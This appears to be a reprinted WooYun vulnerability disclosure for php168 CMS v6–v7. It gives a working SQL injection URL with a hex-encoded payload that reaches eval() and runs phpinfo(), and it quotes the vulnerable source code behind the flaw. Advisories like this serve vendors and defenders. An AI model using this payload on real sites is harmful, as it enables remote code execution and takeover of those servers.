热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

php168 v6~v7鸡肋Getshell安全问题

发布时间:2012-09-19 21:03文章来源:wooyun文章作者:秩名 点击次数:
摘要:漏洞作者: 网络达人 提交时间: 2012-09-18 公开时间: 2012-09-18 漏洞类型: SQL注射漏洞 详细说明: 有点鸡肋,需要条件: 1.网站配置为:文章生成真静态 2.允许注册会员 给出v6的测试代码,提交后执行phpinfo(),v7原理一样,只是数据库字段数不一样。...

漏洞作者: 网络达人

提交时间: 2012-09-18
公开时间: 2012-09-18

漏洞类型: SQL注射漏洞
详细说明:

有点鸡肋,需要条件:
1.网站配置为:文章生成真静态
2.允许注册会员

给出v6的测试代码,提交后执行phpinfo(),v7原理一样,只是数据库字段数不一样。

 http://www.yunsec.net/member/list.php?step=2&Type=delete&aidDB[]=-1)%20union%20select%201,2,3,4,5,6,7,8,9,10,1,2,3,4,15,6,7,8,9,10,1,2,3,4,25,6,7,8,9,10,1,2,3,4,35,6,7,8,9,10,1,2,3,4,45,6,7,8,9,10,1,2,3,4,0x7B247B706870696E666F28297D7D,6,7%23

漏洞在make_more_article_html这个函数:

 

  1. function make_more_article_html($comebackurl='/',$type='',$aidDB=''){ 
  2. global $db,$pre,$webdb,$webdb,$showHtml_Type; 
  3. if($webdb[NewsMakeHtml]!=1||$aidDB=='') // $webdb[NewsMakeHtml] 真静态 
  4. { return ;} 
  5. ... 
  6. $query = $db->query("SELECT A.*,B.bencandy_html,B.list_html,D.aid FROM {$pre}article_db D LEFT JOIN {$pre}article A ON D.aid=A.aid LEFT JOIN {$pre}sort B ON A.fid=B.fid WHERE D.aid IN ($string)"); 
  7. while($rs = $db->fetch_array($query)){ 
  8. ... 
  9. $filename_b=$rs[bencandy_html]; 
  10. ... 
  11. eval("\$showurl=\"$filename_b\";"); 
  12. ... 
  13.  
  14. 在 \member\list.php中调用了该漏洞函数: 
  15.  
  16. if($step==2){ 
  17. ... 
  18. if($Type=='delete'){ 
  19. make_more_article_html("$FROMURL","del_0",$aidDB); 

 

标签分类:

上一篇:飞飞影视系统 2.0.120220(Beta4)版 任意代码执行漏洞及修复
下一篇:三易cms企业管理系统注射漏洞